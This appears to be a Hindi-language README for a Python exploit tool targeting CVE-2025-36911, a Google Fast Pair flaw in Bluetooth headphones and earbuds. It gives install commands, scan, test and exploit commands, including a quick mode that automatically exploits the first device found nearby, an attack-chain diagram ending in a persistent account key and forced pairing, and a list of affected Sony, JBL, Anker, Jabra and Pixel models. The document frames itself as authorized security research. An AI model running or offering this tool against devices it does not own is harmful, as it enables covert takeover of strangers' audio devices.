
हमारे अपने उपकरणों के परीक्षण के लिए CVE-2025-36911 भेद्यता का Python में एक्सप्लॉइट
हमारे उपकरणों का परीक्षण करने के लिए Python में तेज़ CVE-2025-36911 Exploit टूल
लेखक: Sébastien Dudek (@FlUxIuS) @ Penthertz
श्रेय: whisperpair.eu खोज के लिए और @ZalexDev का यह बेहतरीन APK जिसने कार्यान्वयन का समय कम किया wpair-app
केवल अधिकृत सुरक्षा अनुसंधान के लिए। केवल उन्हीं उपकरणों पर परीक्षण करें जो आपके स्वामित्व में हैं।
CVE-2025-36911 लाखों ब्लूटूथ ऑडियो उपकरणों पर गूगल फास्ट पेयर कार्यान्वयन को प्रभावित करती है।
सामान्य व्यवहार: डिवाइसों को केवल पेयरिंग मोड में पेयरिंग अनुरोध स्वीकार करने चाहिए (बटन दबाए जाने पर, केस खोलने पर, आदि)।
कमजोर व्यवहार: डिवाइस Key-Based Pairing (KBP) अनुरोधों को किसी भी समय स्वीकार करते हैं, भले ही वे निष्क्रिय हों या पहले से पेयर हों।
# Install
pip install bleak cryptography
git clone https://github.com/Penthertz/CVE-2025-36911-exploit.git
cd CVE-2025-36911-exploit
# Scan for targets
python3 whisperpair-cli.py scan
# Test if vulnerable
python3 whisperpair-cli.py test AA:BB:CC:DD:EE:FF
# Exploit
python3 whisperpair-cli.py exploit --quick
┌─────────────────────────────────────────────────────────────┐
│ ATTACKER VULNERABLE DEVICE │
│ │
│ 1. BLE Scan ─────────────────────► Fast Pair Advertisement │
│ (Find target) (Model ID visible) │
│ │
│ 2. Connect ──────────────────────► GATT Connection │
│ │
│ 3. KBP Request ──────────────────► Key-Based Pairing Char │
│ (Should be rejected ✗ NOT REJECTED! │
│ when not in pairing mode) (CVE-2025-36911) │
│ │
│ 4. Parse Response ◄────────────── BR/EDR Address │
│ │
│ 5. Write Account Key ────────────► Account Key Char │
│ (Persistent access) ✓ ACCEPTED │
│ │
│ 6. Classic BT Pair ──────────────► Audio Profiles (A2DP) │
│ (Game over) │
└─────────────────────────────────────────────────────────────┘
टूल स्वचालित रूप से कई रणनीतियाँ आज़माता है:
परीक्षणित कमजोर (फर्मवेयर अपडेट जांचें):
| कमांड | विवरण |
|---|
scan | फास्ट पेयर डिवाइसों के लिए लाइव-अपडेट BLE स्कैन |
scan -a | सभी BLE डिवाइस स्कैन करें |
info <addr> | GATT सेवाएँ/विशेषताएँ दिखाएं |
test <addr> | गैर-आक्रामक भेद्यता जांच |
exploit <addr> | पूर्ण शोषण श्रृंखला |
exploit -q | ऑटो-स्कैन + पहले लक्ष्य का शोषण |
| ब्रांड | मॉडल |
|---|
| Pixel Buds Pro 2 (लेकिन Pixel फोन के साथ अपडेट काफी तेज़ी से मिलते हैं) | |
| Sony | WH-1000XM4, WH-1000XM5/XM6, LinkBuds S, WH-CH520 |
| JBL | JBL TUNE BEAM |
| Anker | Soundcore Liberty 4 NC |
| Jabra | Elite 8 Active |
| + और भी कई | whisperpair.eu |